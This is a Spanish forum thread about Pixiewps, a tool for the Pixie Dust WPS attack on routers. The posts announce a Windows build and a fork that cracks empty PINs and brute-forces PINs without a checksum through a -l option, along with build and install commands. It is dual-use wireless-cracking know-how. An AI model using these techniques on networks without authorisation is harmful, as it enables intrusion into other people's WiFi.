Los usuarios de Linux lo tienen más fácil para compilar este tipo de herramientas en cambio en Windows hay que dar un par de vueltas y no todos los usuarios saben como. Así que para celebrar que tenemos nueva versión, adjunto un compilado para windows PixieWps_1_2_2-Windows.zip, para que quien quiera lo pueda probar también en Windows.

Ultima edición por Patcher (12-02-2017 21:17:39)

Desconectado

#24 12-02-2017 18:38:03

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Añado un link hacía tu mensaje en primer post para que no pase desparecido. wink

The Wiire.

Esta serie no la he visto.... big_smile

Buena noticia, la estaba esperando

Le había escrito un mail para comentárselo.
Resulta que no abre más su mail de contacto git hub porque lo tiene "flooded" por gente que pide asistencia para crackear routers. tongue
Al final un día salí en una conversación con soxrock2212, le comenté que habías tenido un fail raro con Ralink y lo ha contactado por "vía privilegiada".
Se hubiera podido arreglar hace tiempo... tongue

Desconectado

#25 05-09-2017 12:29:14

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Compatibilidad PIN "null" y PIN sin Checksum

    Hace unos días atrás Binnarymaster (del foro antichat.ru) ha presentado en Git Hub una actualización muy interesante.
  Recuerdo que es a binnarymaster que debemos la opción "-p with arbitrary string" de reaver 1.6.1 que permite mandar un PIN "NULL" o un PIN que no respecta la regla del Checksum (o la cadena que queremos)
  Ver: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

PIN Null

 
Total que pixiewps no considera la posibilidad de un resultado "NULL" (no valor) y nuestro ataque pixiewps no encontrará el PIN vació
  Binnarymaster ha adaptado el código de pixiewps para crackear también los PIN vacíos. cool

Brute force PIN sin checksum

  El otro aporte es relativo al ataque de fuerza bruta sobre semilla tiempo.
La vulnerabilidad de los Puntos de Acceso  con chipset WiFi Realtek.
  El brute force se hace con un diccionario de PIN "legales"
Es decir: 8 dígitos y el último dígito es una suma de comprobación de los siete precedentes (y por lo tanto "fijo")
Si nuestro router está configurado con un PIN que no respecta la regla del Checksum el ataque fallaría.
No se comprobaría el PIN 12345671 (PIN no conforme).
Se comprobaría 12345670 (PIN conforme) y no se encontraría el PIN 12345678 "mal-formado" 

  1. El crack de PIN vacío es una sola posibilidad y se hace automáticamente.

  2. Para habilitar el crack de PIN sin checksum emplearemos la opción -l

     -l, --length      : Brute-force entire pin length (experimental)

Otra cosa (me parece muy bien): Binnarymaster ha vuelto a introducir la opción -f (--force) para forzar el lanzamiento del Brute Force.
Wiire la ha quitado porqué pixiewps detecta automáticamente los PA vulnerables.
  El problema es que el sistema no era sin fallos y es de todo modo mejor tener la posibilidad de probar lo que queremos.   
 
  Para probar la versión de binnarymaster debéis descargarla desde Git Hub

git clone https://github.com/binarymaster/pixiewps.git

  Situar la terminal en la rama descargada

cd pixiewps/src/ 

  Compilar

make

  Instalar

sudo make install

¡Y listo!

Desconectado

Temas similares

Tema Respuestas Vistas Ultimo mensaje
2 166 Hoy 15:25:52 por Patcher
Pegado:
521 339980 10-05-2023 18:24:28 por Betis-Jesus
Hospital clinic dump por wifiyeah  [ 1 2 ]
27 1242 09-05-2023 21:32:44 por kcdtv
Hacktivismo por CHARGER22
1 205 08-05-2023 19:53:26 por kcdtv
Pegado:
Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r  [ 1 2 3 18 ]
447 66089 22-04-2023 15:31:13 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: klurosu
Usuarios registrados conectados: 0
Invitados conectados: 5

Estadisticas de los foros

Número total de usuarios registrados: 2,446
Número total de temas: 1,637
Número total de mensajes: 15,586

Máx. usuarios conectados: 373 el 30-09-2019 15:04:36